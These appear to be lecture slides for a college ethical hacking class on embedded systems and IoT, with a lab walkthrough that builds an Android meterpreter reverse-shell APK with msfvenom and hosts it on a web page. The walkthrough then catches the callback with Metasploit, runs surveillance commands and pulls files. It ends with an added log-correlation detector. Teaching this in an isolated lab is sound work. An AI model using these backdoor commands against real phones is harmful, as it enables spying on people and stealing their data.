CIS 76 - Lesson 11: Rich's Lesson Module Checklist

The document outlines Rich's checklist for his CIS 76 lesson, including ensuring slides and labs are posted, preparation of flashcards and handouts, testing and publishing of Lab 9, and bringing backup materials and supplies to class. It also lists the student checklist for attending class which includes accessing the lesson materials online and joining the virtual classroom. The document provides an overview of Rich's checklist for setting up and using the virtual classroom software.


CIS 76 - Lesson 11

Rich's lesson module checklist


[ ] Slides and lab posted
[ ] WB converted from PowerPoint
[ ] Print out agenda slide and annotate page numbers
[ ] Flash cards
[ ] Properties
[ ] Page numbers
[ ] 1st minute quiz
[ ] Web Calendar summary
[ ] Web book pages
[ ] Commands
[ ] Lab 9 tested and published
[ ] Backup slides, whiteboard slides, CCC info, handouts on flash drive
[ ] Spare 9v battery for mic
[ ] Key card for classroom door

Last updated 11/8/2016


(CIS 76 Ethical Hacking course topic map: TCP/IP, Network and Computer Attacks, Footprinting and Social Engineering, Port Scanning, Enumeration, Scripting and Programming, Desktop and Server Vulnerabilities, Embedded Operating Systems, Hacking Web Servers, Hacking Wireless Networks, Cryptography, Evading Network Devices)

Student Learner Outcomes

1. Defend a computer and a LAN against a variety of different types of security attacks using a number of hands-on techniques.

2. Defend a computer and a LAN against a variety of different types of security attacks using a number of hands-on techniques.

Introductions and Credits


Rich Simms
• HP Alumnus.
• Started teaching in 2008 when Jim Griffin went on sabbatical.
• Rich's site: http://simms-teach.com

And thanks to:

• Steven Bolt for his WASTC EH training.
• Kevin Vaccaro for his CSSIA EH training and Netlab+ pods.
• EC-Council for their online self-paced CEH v9 course.
• Sam Bowne for his WASTC seminars, textbook recommendation and fantastic EH website (https://samsclass.info/).
• Lisa Bock for her great lynda.com EH course.
• John Govsky for many teaching best practices: e.g. the First Minute quizzes, the online forum, and the point grading system (http://teacherjohn.com/).
• Google for everything else!

Student checklist for attending class

1. Browse to: http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today's lesson.
5. Find the Presentation slides for the lesson and download for easier viewing.
6. Click the Enter virtual classroom link to join CCC Confer.
7. Log into Opus with Putty or ssh command.

Note: Blackboard Collaborate Launcher only needs to be installed once. It has already been downloaded and installed on the classroom PC's.

Student checklist for suggested screen layout

• Google
• CCC Confer
• Downloaded PDF of Lesson Slides
• CIS 76 website Calendar page
• One or more login sessions to Opus

Student checklist for sharing desktop with classmates

1) Instructor gives you sharing privileges.

2) Click overlapping rectangles icon. If white "Start Sharing" text is present then click it as well.

3) Click OK button.

4) Select "Share desktop" and click Share button.

Rich's CCC Confer checklist - setup

[ ] Preload White Board

[ ] Connect session to Teleconference (status should read "Session now connected to teleconference")

[ ] Is recording on? (red dot means recording)

[ ] Use teleconferencing, not mic (the phone handset icon should change to a little microphone icon and the "Teleconferencing …" message should be displayed; the mic icon should be grayed out)

Rich's CCC Confer checklist - screen layout

[ ] layout and share apps: foxit for slides, chrome, vSphere Client, putty

Rich's CCC Confer checklist - webcam setup

[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus


Rich's CCC Confer checklist - Elmo

The "rotate image" button is necessary if you use both the side table and the white board.

Quite interesting that they consider you to be an "expert" in order to use this button!

(Pictured: Elmo rotated down to view side table; Elmo rotated up to view white board; the rotate image button)

Run and share the Image Mate program just as you would any other app with CCC Confer.

Rich's CCC Confer checklist - universal fixes

Universal Fix for CCC Confer:

1) Shrink (500 MB) and delete Java cache
2) Uninstall and reinstall latest Java runtime
3) http://www.cccconfer.org/support/technicalSupport.aspx

(Screenshot callouts: Control Panel (small icons); General Tab > Settings…; 500MB cache size; Delete these; Google "Java download")

Start

Sound Check
Students that dial-in should mute their line using *6 to prevent unintended noises distracting the web conference.

Instructor can use *96 to mute all student lines or *5 to boost audio input volume.

Instructor: Rich Simms
Dial-in: 888-886-3951
Passcode: 136690

Ryan, Jordan, Takashi, Karl-Heinz, Sean, Benji, Joshua, Brian, Tess, Jeremy, David H., Roberto, Nelli, Mike C., Deryck, Alex, Michael W., Carter, Thomas, Wes, Jennifer, Marcos, Tim, Luis, Dave R.

Email me ([email protected]) a relatively current photo of your face for 3 points extra credit

First Minute Quiz


Please answer these questions in the order shown:

email answers to: [email protected]

(answers must be emailed within the first few minutes of class for credit)

Embedded Operating Systems


Objectives
• Understand what embedded operating systems are.
• Describe various embedded operating systems in use today.
• Identify ways to protect embedded operating systems.

Agenda
• Quiz
• Questions
• In the news
• Best practices
• Housekeeping
• Embedded systems
• Enterprise IoT Risk Report
• Industrial Control Systems
• Hacking a webcam (work in progress)
• Hacking Android
• Assignment
• Wrap up

Admonition


Unauthorized hacking is a crime.

The hacking methods and activities learned in this course can result in prison terms, large fines and lawsuits if used in an unethical manner. They may only be used in a lawful manner on equipment you own or where you have explicit permission from the owner.

Students that engage in any unethical, unauthorized or illegal hacking may be dropped from the course and will receive no legal protection or help from the instructor or the college.

Questions

Questions
How this course works?

Past lesson material?

Previous labs?

Chinese Proverb: He who asks a question is a fool for five minutes; he who does not ask a question remains a fool forever.

Shutdown all:

EH-WinXP VMs
EH-OWASP VMs


In the news

Recent news

Ukraine hackers claim huge Kremlin email breach

http://www.bbc.com/news/world-europe-37857658

• Claim to have hacked the emails of top Kremlin officials.
• Appears to show Russian control and financing of the separatists in eastern Ukraine.
• Russia denies it, saying the hacked official does not use email.

Recent news

Drone hacks room of smart light bulbs

http://www.theverge.com/2016/11/3/13507126/iot-drone-hack

• Researchers demonstrated infecting one Hue light with a virus that spreads from lamp to lamp.
• The lights did not have to be on the same private network to get infected.
• The researchers did not need physical access to the lights.
• The infected lights blinked SOS in Morse code.

Recent news

Top 10 gadgets for white hat hackers

http://www.welivesecurity.com/2016/10/31/10-gadgets-every-white-hat-hacker-needs-toolkit/

1. Raspberry Pi 3
2. WiFi Pineapple
3. Alfa Network Board
4. Rubber Ducky
5. Lan Turtle
6. HackRF One
7. Ubertooth One
8. Proxmark3 Kit
9. Lockpicks
10. Keylogger

Recent news

Microsoft fix for hack used by Russian hackers

http://www.therecord.com/news-story/6946321-microsoft-to-block-windows-flaw-used-by-russian-hackers/

• Will address a hack used by a group Microsoft calls Strontium.
• CrowdStrike says Strontium is another name for the Russian group Fancy Bear, AKA APT 28*.
• Flaw linked to the theft of DNC emails.
• The exploit involves multiple versions of Windows and Adobe Flash.
• Adobe has already released a fix for Flash.
• The exploits were first discovered by Google's Threat Analysis Group.
• Some policy conflict between Google and Microsoft on timing.
http://www.cso.com.au/article/609439/google-outs-windows-zero-day-shields-chrome-first/

*See 2014 FireEye report on APT 28 here: https://www2.fireeye.com/CON-ACQ-RPT-APT28_LP.html

More on APT 28

For more information on APT 28 see the 2014 FireEye report here:

http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf

Recent news
Fake office printer hijacks cell phone connection
http://arstechnica.com/information-technology/2016/11/this-evil-office-printer-hijacks-your-cellphone-connection/

• People are used to cell phone towers disguised as trees.
• This one was disguised as an HP printer.
• It was a demonstration of cell phone privacy flaws.
• Using GSM technology, nearby cell phones will connect to the strongest signal, which was the fake printer.
• Could potentially eavesdrop on SMS texts and voice calls.
• Instead it carries out a text message conversation with hijacked phones, then connects them to a real cell tower.

Recent news
No more "red purses" in Chrome
https://www.wired.com/2016/11/googles-chrome-hackers-flip-webs-security-model/

(Pictured: Chrome security team)

• Starting in January the HTTPS encryption indicators will clearly flag "not secure" sites.
• Leader of the Chrome security team, Parisa Tabriz, started her security job as a white-hat hacker testing Google's code.
• In 2010 she and another started a "Resident Hacker" program to train programmers to find, exploit and patch security bugs in their own code.

Recent news
Mirai botnet attacks an entire country
http://www.forbes.com/sites/leemathews/2016/11/03/someone-just-used-the-mirai-botnet-to-knock-an-entire-country-offline/
http://www.esecurityplanet.com/network-security/massive-ddos-attacks-disable-internet-access-throughout-liberia.html/

• The Mirai botnet first attacked security expert Brian Krebs's website (620 Gbps of traffic).
• Then it attacked the Dyn DNS servers knocking out access to a number of major websites (1200 Gbps of traffic).
• Now it was used against Liberia, population 4.5 million (500 Gbps of traffic), bringing about service interruptions for a day.

Recent news
Tesco bank attack involving 40,000 accounts
http://www.bbc.com/news/technology-37896273/
https://www.theguardian.com/money/2016/nov/07/tesco-bank-fraud-key-questions-answered-suspicious-transactions-40000-accounts/

• Tesco is a British retail bank.
• It started as a joint venture between The Royal Bank of Scotland and Tesco, the UK's largest supermarket.
• Suspicious transactions on some 40,000 accounts with money taken from half of them.

Recent news
China passes controversial cybersecurity law
http://computerworld.com/article/3138951/security/china-passes-controversial-cybersecurity-law.html/
http://www.reuters.com/article/us-china-parliament-cyber-idUSKBN132049

• Strengthens control over the Internet in China.
• Foreign companies must store personal information and business data on servers in China.
• Companies must submit to a security assessment if data is to be moved out of the country.
• Prohibited content includes overthrowing the socialist system, splitting the nation, undermining national unity and advocating terrorism and extremism.

Best Practices

Online Banking Best Practices

1. Choose a strong password and do not reuse it with other accounts.

2. Keep your PC, phone or tablet updated.

3. Be on the look-out for phishing emails that capitalize on the news about any breach.

4. Use the bank's two-factor authentication.

http://www.bbc.com/news/technology-37896273

Additional contributions from the classroom:

6. Close the session when done.
7. Don't have lots of other tabs open.
8. Don't use answers to the security questions that will reveal personal information if compromised.
9. Outside of online banking it was noted that many companies ask for your real birthdate which they don't really need. That information could also be compromised.

Smart Device Best Practices

1. Do an inventory of all IoT devices.

2. Change the default passwords.

3. Disable Universal Plug and Play (UPnP). Check your router too on this.

4. Disable remote management via telnet or ssh.

5. Check for software updates and patches.

http://thehackernews.com/2016/10/ddos-attack-mirai-iot.html

Housekeeping


Housekeeping

1. Lab 8 due tonight by 11:59pm.

2. Note: Lab 9 and five posts due next week.

3. You can still send me your photo for our class page if you want 3 points extra credit.

Where to find your grades

Send me your survey to get your LOR code name.

The CIS 76 website Grades page: http://simms-teach.com/cis76grades.php

Or check on Opus:
checkgrades codename
(where codename is your LOR codename)
Written by Jesse Warren, a past CIS 90 Alumnus

Points that could have been earned:
7 quizzes: 21 points
7 labs: 210 points
2 tests: 60 points
2 forum quarters: 40 points
Total: 331 points

At the end of the term I'll add up all your points and assign you a grade using this table.

Heads up on Final Exam


Test #3 (final exam) is THURSDAY Dec 15 4-6:50PM

(Calendar callout: Extra credit labs and final posts due by 11:59PM Thursday)

• All students will take the test at the same time. The test must be completed by 6:50PM.

• Working and long distance students can take the test online via CCC Confer and Canvas.

• Working students will need to plan ahead to arrange time off from work for the test.

• Test #3 is mandatory (even if you have all the points you want)


Red and Blue Teams

Red and Blue Pods in Microlab Lab Rack

(Pictured: Red Pod, Blue Pod, Red and Blue VMs)

Rules of engagement updated regarding VLab credentials.

Send me an email if you would like to join a team.

Embedded Systems

Embedded Operating Systems

Embedded systems, unlike general purpose PCs and servers, are appliances/devices built with a computer system to perform a specific function:

• Network devices like routers, switches, firewalls and access points
• Digital video recorders like Tivo
• Bank ATMs
• Smart phones
• GPSs
• Point of sale "cash registers"
• Entertainment systems like the ones found in airliners
• HVAC systems like the one in building 800
• Factory automation
• IoT devices
• Airliner and jet fighter Avionics
• Printers, scanners, faxes, copiers
• And many more

Embedded Operating Systems

Embedded operating systems

• Small, efficient and often require less power.
• Typically use less memory and have no hard drive.
• Examples:
  • Stripped down versions of desktop operating systems:
    • Linux
    • Windows Embedded family
  • Real Time Operating Systems (RTOS)
    • VxWorks by Wind River Systems
    • Green Hills Software
    • QNX
    • Siemens
• Are networked
• Can be difficult to patch
Embedded Linux (just a few)

(Pictured: Katana Robotic Arm, Erle-Copter drone, Asus RT-AC66U wireless router, Nest Cam, Amazon Kindle, Stir smart desk, Tivo, Yamaha Disklavier Mark IV, some Android cell phones, TomTom GPS models, Garmin Nuvi 5000, Buffalo NAS storage, Virgin America Personal Entertainment System, TripBPX, MikroTik Routers, Sony TVs, Polycom VOIP Phone, Android Tablets, Raspberry Pi)

For more see: http://linuxgizmos.com/category/devices/
Windows Embedded Family

http://news.thewindowsclub.com/microsoft-unveils-windows-embedded-8-1-download-industry-release-preview-now-64071/

Windows XP Embedded

Embedded Windows Family for Medical Products

http://ocs.arrow.com/msembedded/medical/

Wind River Systems


VxWorks Real Time Operating System

(Customers pictured: Mars Rover, Jetliner avionics, Medical Systems, Map Displays, Control Systems for large Telescopes, Industrial Systems)

http://www.windriver.com/customers/

Green Hills Software


Integrity RTOS

http://www.ghs.com/CustomerGallery.html

QNX
QNX OS and QNX Neutrino RTOS

https://www.qnx.com/

Siemens
SIMATIC PCS 7


IoT Risk Report

ForeScout IoT Enterprise Risk Report

https://www.scribd.com/document/328841509/Hackable-devices

ForeScout IoT Enterprise Risk Report

https://www.youtube.com/watch?v=CeTILnlh2ek&feature=youtu.be

Industrial Control Systems

Industrial Control Systems

• SCADA (Supervisory Control and Data Acquisition)
  • SCADA is a category of software for process control and automation.
  • Used in power plants, oil refineries, telecommunications, transportation, water and waste control.
  • Examples:
    • Siemens SIMATIC WinCC

https://instrumentsignpost.files.wordpress.com/2012/02/sanscybersecurityposter.jpg

Idaho National Lab Aurora Demonstration

https://www.youtube.com/watch?v=fJyWngDco3g

• 3.8 MVA diesel electrical power generator damaged by demonstration cyber attack
https://www.smartgrid.gov/files/Aurora_Vulnerability_Issues_Solution_Hardware_Mitigation_De_201102.pdf

STUXNET

The attack on Iran's nuclear centrifuges

https://sharkscale.wordpress.com/2016/02/06/defending-against-stuxnet/

Hacking a Webcam

Work in Progress

D-Link 933L

(Labels: RJ-45 LAN Jack, Power LED, Reset hole, WPS (WiFi Protected Setup))

http://us.dlink.com/products/home-solutions/day-night-wifi-camera-dcs-933l/

https://www.cvedetails.com/

https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dcs931l_upload

McLean, Virginia - February 25, 2015

Tangible Security researchers Mike Baucom, Allen Harper, and J. Rach discovered serious vulnerabilities in two devices made by D-Link.

https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities

D-Link DCS-931L
A Day & Night Wi-Fi Camera
• More info from vendor
• CVE-2015-2049
• Vulnerability Description: A hidden webpage on the device allows an attacker to upload arbitrary files from the attacker's system. By allowing the attacker to specify the file location to write on the device, the attacker has the ability to upload new functionality. The D-Link DCS-931L: Firmware Version 1.04 (2014-04-21) / 2.0.17-b62. Older versions and configurations were NOT tested. This also applies to DCS-930L, DCS-932L, DCS-933L models.
• Impact Description: By allowing any file in the file system to be overwritten, the attacker is allowed to overwrite functionality of the device. The unintended functionality reveals details that could lead to further exploitation. There are security impacts to the confidentiality, integrity, and availability of the device and its services.
< Snipped >
Tangible Security is unaware of any public exploits of these vulnerabilities. However, due to the categorization of these vulnerabilities, it may be reasonable to believe that cyber criminals are doing so.
We urge users of these devices, including older and newer models, to download and install the latest firmware updates available from D-Link that address these vulnerabilities. Failing to do so exposes those benefiting from the use of these devices to cyber crime risks.
Our researchers wish to express their appreciation for D-Link's cooperation and desire to make their products and customers more secure.

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/dlink_dcs931l_upload.rb

Hacking an Android Device

Shutdown all:

EH-WinXP VMs
EH-OWASP VMs


Part 1: EH-pfSense-xx - Setup DHCP

EH-pfSense-xx

Browse to your EH-pfSense-xx VM.

Under the Service menu, select DHCP Server.


EH-pfSense-xx

This example was done on Pod 5. Be sure to use your own pod number when configuring DHCP.

EH-pfSense-xx

To activate your changes click the Save button at the bottom of the window.

Part 2: EH-Lolli-xx - Setup, snapshot, and test

Android-x86 Project
Android-x86 ISOs available here

http://www.android-x86.org/

Android-x86 Project

The Android 5.5 Lollipop release works fine as an ESXi VM.

To make an ESXi VM use 1GB RAM, E1000 adapter, and an IDE hard drive. Make a 100MB SDA partition for grub and boot files and a second SDB partition for everything else. Install Android-x86 on the second partition. Be sure to make the first partition bootable!

http://www.android-x86.org/download

EH-Lolli-xx

1. Use Edit Settings... to join your EH-Lolli-xx VM to your pod network.

2. Create a snapshot named Baseline.

3. Power up.

Initial setup for your new Lollipop VM

EH-Lolli-xx

Home button

EH-Lolli-xx

Terminal Emulator App

EH-Lolli-xx
ifconfig eth0
ping google.com
Ctrl-C
exit

Check that your EH-Lolli-xx VM got an IP address from your EH-pfSense-xx VM and has network connectivity.

Part 3: EH-Lolli-xx - Create some data (to steal)

EH-Lolli-xx

Browser icon

EH-Lolli-xx

Find some pictures you like

EH-Lolli-xx

Select one picture then click-and-hold to get pop-up menu

EH-Lolli-xx

Save the image

EH-Lolli-xx

File Manager App

Part 4: EH-Kali-xx - Create backdoor payload

EH-Kali-xx

msfvenom -l | grep droid

msfvenom
• is a payload generator.
• It replaces the older msfpayload and msfencode tools.

https://www.offensive-security.com/metasploit-unleashed/msfvenom/

EH-Kali-xx

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.76.5.150 LPORT=4444 R > backdoor.apk

root@eh-kali-05:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.76.5.150 LPORT=4444 R > backdoor.apk


No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9487 bytes

root@eh-kali-05:~#

This creates a "back door" payload for Android. When it runs it will
connect back to EH-Kali-05 in Pod 5 at 10.76.5.150 using port 4444.


Part 5: EH-Kali-xx - Make a website

EH-Kali-xx

cd /var/www/html
scp -r xxxxx76@opus:/home/cis76/depot/webpages/* .
mkdir files
cp /root/backdoor.apk files/

root@eh-kali-05:/var/www/html# scp -r simben76@opus:/home/cis76/depot/webpages/* .


simben76@opus's password:
admonition 100% 33 0.0KB/s 00:00
cylons.html 100% 352 0.3KB/s 00:00
humans.html 100% 373 0.4KB/s 00:00
galactica.png 100% 39KB 39.1KB/s 00:00
cylon.gif 100% 1074KB 1.1MB/s 00:00
index.html 100% 156 0.2KB/s 00:00
root@eh-kali-05:/var/www/html# ls
admonition backup-L9.tar cylons.html humans.html images index.html
root@eh-kali-05:/var/www/html#

Build a website to distribute the "backdoor" payload

EH-Kali-xx

Edit index.html and add this line:

<p>Please download this malicious file and install it: <a href="files/backdoor.apk">backdoor.apk</a></p>

Create a files directory for the payload file then set permissions.

EH-Kali-xx

service apache2 start

root@eh-kali-05:/var/www/html# service apache2 start


root@eh-kali-05:/var/www/html#

Start the web service on EH-Kali

EH-Kali-xx

Test your website on EH-Kali by browsing to localhost

Part 6: EH-Kali-xx - Exploit Android
EH-Kali-xx

cd
service postgresql start
msfdb init
msfconsole

root@eh-kali-05:~# service postgresql start
root@eh-kali-05:~# msfdb init
A database appears to be already configured, skipping initialization
root@eh-kali-05:~# msfconsole
(Metasploit ASCII-art banner)
http://metasploit.com

=[ metasploit v4.12.15-dev ]
+ -- --=[ 1563 exploits - 904 auxiliary - 269 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Start Metasploit

EH-Kali-xx

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.76.5.150
set lport 4444
exploit

msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.76.5.150
LHOST => 10.76.5.150
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.76.5.150:4444
[*] Starting the payload handler...

Set up a handler to listen for the "backdoor" on the Android to connect back.

Part 7: EH-Lolli-xx - Install malicious payload

EH-Lolli-xx

Select the browser

Browse to EH-Kali at http://10.76.xx.150 and download the file.

Drag from the top of the window down to reveal the downloaded file. Select it for installation.

On the Warning message select Settings

Enable installation from unknown sources then select Home

Select File Manager

Select Download folder

Select backdoor.apk to install

Part 8: EH-Kali-xx - Exfiltrate image file

EH-Kali-xx

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.76.5.150:4444
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 10.76.5.120
[*] Meterpreter session 1 opened (10.76.5.150:4444 -> 10.76.5.120:54598) at 2016-11-05 18:54:44 -0700

meterpreter >

Once the backdoor app is opened on the Victim's Android we get a session on EH-Kali.

EH-Kali-xx

geolocate
dump_sms
webcam_stream
record_mic

meterpreter > geolocate
[-] geolocate: Operation failed: 1
meterpreter > dump_sms
[*] No sms messages were found!
meterpreter > webcam_stream
[-] Target does not have a webcam
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /root/DqSWstCd.wav
meterpreter >

These commands don't appear to work on the VM.

They do work on real Android phones though. See examples here:

http://resources.infosecinstitute.com/lab-android-exploitation-with-kali/

EH-Kali-xx

sysinfo
meterpreter > sysinfo
Computer : localhost
OS : Android 5.1.1 - Linux 4.0.9-android-x86+ (i686)
Meterpreter : java/android
meterpreter >


EH-Kali-xx

ipconfig
meterpreter > ipconfig

Interface 1
============
Name : ip6tnl0 - ip6tnl0
Hardware MAC : 00:00:00:00:00:00

Interface 2
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::

Interface 3
============
Name : sit0 - sit0
Hardware MAC : 00:00:00:00:00:00

Interface 4
============
Name : eth0 - eth0
Hardware MAC : 00:50:56:af:78:28
IPv4 Address : 10.76.5.120
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::250:56ff:feaf:7828
IPv6 Netmask : ::

meterpreter >

EH-Kali-xx

pwd
meterpreter > pwd
/data/data/com.metasploit.stage/files
meterpreter >

EH-Kali-xx

cd /
ls

meterpreter > cd /
meterpreter > ls
Listing: /
==========

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40444/r--r--r-- 0 dir 2016-11-06 15:05:08 -0800 acct
40000/--------- 80 dir 2016-11-06 15:05:20 -0800 cache
0000/--------- 0 fif 1969-12-31 16:00:00 -0800 charger
40000/--------- 40 dir 2016-11-06 15:05:08 -0800 config
40444/r--r--r-- 0 dir 2016-11-06 15:05:05 -0800 d
40000/--------- 4096 dir 2016-11-06 15:01:27 -0800 data
100444/r--r--r-- 320 fil 2016-11-06 15:05:06 -0800 default.prop
40444/r--r--r-- 3840 dir 2016-11-06 15:05:10 -0800 dev
40444/r--r--r-- 4096 dir 2015-10-06 09:52:36 -0700 etc
100444/r--r--r-- 11166 fil 2016-11-06 15:05:06 -0800 file_contexts
100000/--------- 342 fil 2016-11-06 15:05:06 -0800 fstab.android_x86
100000/--------- 850420 fil 2016-11-06 15:05:06 -0800 init
100000/--------- 5666 fil 2016-11-06 15:05:06 -0800 init.android_x86.rc
100000/--------- 1022 fil 2016-11-06 15:05:06 -0800 init.bluetooth.rc
100000/--------- 944 fil 2016-11-06 15:05:06 -0800 init.environ.rc
100000/--------- 21746 fil 2016-11-06 15:05:06 -0800 init.rc
100000/--------- 588 fil 2016-11-06 15:05:06 -0800 init.superuser.rc
100000/--------- 1927 fil 2016-11-06 15:05:06 -0800 init.trace.rc
100000/--------- 3885 fil 2016-11-06 15:05:06 -0800 init.usb.rc
100000/--------- 301 fil 2016-11-06 15:05:06 -0800 init.zygote32.rc
40444/r--r--r-- 8192 dir 2015-10-06 12:32:34 -0700 lib
40444/r--r--r-- 160 dir 2016-11-06 15:05:08 -0800 mnt
40444/r--r--r-- 0 dir 2016-11-06 15:05:05 -0800 proc
100444/r--r--r-- 2771 fil 2016-11-06 15:05:06 -0800 property_contexts
40000/--------- 140 dir 2016-11-06 15:05:06 -0800 sbin
40666/rw-rw-rw- 4096 dir 2016-11-06 14:44:45 -0800 sdcard
100444/r--r--r-- 471 fil 2016-11-06 15:05:06 -0800 seapp_contexts
100444/r--r--r-- 76 fil 2016-11-06 15:05:06 -0800 selinux_version
100444/r--r--r-- 118329 fil 2016-11-06 15:05:06 -0800 sepolicy
100444/r--r--r-- 9438 fil 2016-11-06 15:05:06 -0800 service_contexts
40444/r--r--r-- 180 dir 2016-11-06 15:05:08 -0800 storage
40444/r--r--r-- 0 dir 2016-11-06 15:05:06 -0800 sys
40444/r--r--r-- 4096 dir 1969-12-31 16:00:00 -0800 system
100444/r--r--r-- 382 fil 2016-11-06 15:05:06 -0800 ueventd.android_x86.rc
100444/r--r--r-- 4314 fil 2016-11-06 15:05:06 -0800 ueventd.rc
40444/r--r--r-- 4096 dir 2015-10-06 09:47:38 -0700 vendor
100000/--------- 113 fil 2016-11-06 15:05:08 -0800 x86.prop

meterpreter >

EH-Kali-xx
cd /sdcard
ls

meterpreter > cd /sdcard
meterpreter > ls
Listing: /storage/emulated/legacy
=================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Alarms
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:06 -0700 Android
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 DCIM
40666/rw-rw-rw- 4096 dir 2016-11-06 15:28:29 -0800 Download
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Movies
40666/rw-rw-rw- 4096 dir 2016-11-05 14:39:59 -0700 Music
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Notifications
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Pictures
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Podcasts
40666/rw-rw-rw- 4096 dir 2016-11-05 14:40:00 -0700 Ringtones
40666/rw-rw-rw- 4096 dir 2016-11-06 14:44:45 -0800 storage

meterpreter >

EH-Kali-xx
cd Download
ls


EH-Kali-xx

pwd
ls
download images.jpg
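Seen from the pod's pfSense or web server, the whole Part 4 to Part 8 procedure leaves a two-step trail: an Android client fetches an .apk from the EH-Kali web server, then opens a TCP connection back to that same host on a non-web port (4444 here). This added example (not from the course or Metasploit) correlates those two events in Python over constructed sample logs; the Apache combined-log lines and the CSV connection records are made up for the example, and the server address is passed in because the access log does not carry it.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data (not captured from the course pods). Apache combined
# log from the web server on EH-Kali (10.76.5.150): the Android VM at
# 10.76.5.120 fetches index.html and then the .apk; another host reads a page.
APACHE_ACCESS_LOG = """\
10.76.5.120 - - [05/Nov/2016:18:52:10 -0700] "GET /index.html HTTP/1.1" 200 156 "-" "Mozilla/5.0 (Linux; Android 5.1.1; Build/LMY48M) AppleWebKit/537.36"
10.76.5.120 - - [05/Nov/2016:18:52:31 -0700] "GET /files/backdoor.apk HTTP/1.1" 200 9487 "http://10.76.5.150/index.html" "Mozilla/5.0 (Linux; Android 5.1.1; Build/LMY48M) AppleWebKit/537.36"
10.76.5.130 - - [05/Nov/2016:18:53:02 -0700] "GET /cylons.html HTTP/1.1" 200 352 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"
"""

# Constructed connection records as a firewall might export them (CSV).
# The third row is the reverse_tcp callback the handler on port 4444 accepts.
CONNECTION_LOG = """\
src,sport,dst,dport,proto,ts
10.76.5.130,50122,10.76.5.150,80,tcp,2016-11-05T18:53:02-0700
10.76.5.120,49211,8.8.8.8,53,udp,2016-11-05T18:54:40-0700
10.76.5.120,54598,10.76.5.150,4444,tcp,2016-11-05T18:54:44-0700
"""

APACHE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

WEB_PORTS = {80, 443}  # ports on which talking to the web server is expected


def parse_apache(log: str):
    """Yield one dict per well-formed combined-log line; malformed lines are skipped."""
    for line in log.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["status"] = int(rec["status"])
        yield rec


def parse_connections(log: str):
    """Yield one dict per CSV row, with ports as ints and ts as an aware datetime."""
    lines = log.strip().splitlines()
    header = lines[0].split(",")
    for line in lines[1:]:
        rec = dict(zip(header, line.split(",")))
        rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%S%z")
        yield rec


def apk_downloads(access_log: str):
    """Successful GETs of an Android package, regardless of the file's name."""
    return [r for r in parse_apache(access_log)
            if r["method"] == "GET" and r["status"] == 200
            and r["path"].lower().endswith(".apk")]


def find_callbacks(access_log: str, conn_log: str, server_ip: str,
                   window: timedelta = timedelta(minutes=30)):
    """Alert when a client that downloaded an .apk from server_ip opens a TCP
    connection to server_ip on a non-web port within `window` afterwards.
    That pairing is the signature of the msfvenom/multi/handler lab above."""
    alerts = []
    conns = list(parse_connections(conn_log))
    for d in apk_downloads(access_log):
        for c in conns:
            delay = c["ts"] - d["ts"]
            if (c["proto"] == "tcp" and c["src"] == d["client"]
                    and c["dst"] == server_ip and c["dport"] not in WEB_PORTS
                    and timedelta(0) <= delay <= window):
                alerts.append({
                    "client": d["client"], "apk": d["path"],
                    "downloaded_at": d["ts"].isoformat(),
                    "callback": f'{c["dst"]}:{c["dport"]}',
                    "callback_at": c["ts"].isoformat(),
                    "delay_seconds": int(delay.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(APACHE_ACCESS_LOG, CONNECTION_LOG, "10.76.5.150"):
        print(f'ALERT {a["client"]} fetched {a["apk"]} then called back to '
              f'{a["callback"]} after {a["delay_seconds"]}s')
```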

Assignment


Lab 9

Hack an Android phone


Wrap up


Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.

Quiz questions for next class:

• With respect to embedded systems, what is an RTOS?

• Why is UPnP a security issue for IoT devices?

• What is APT 28?


Backup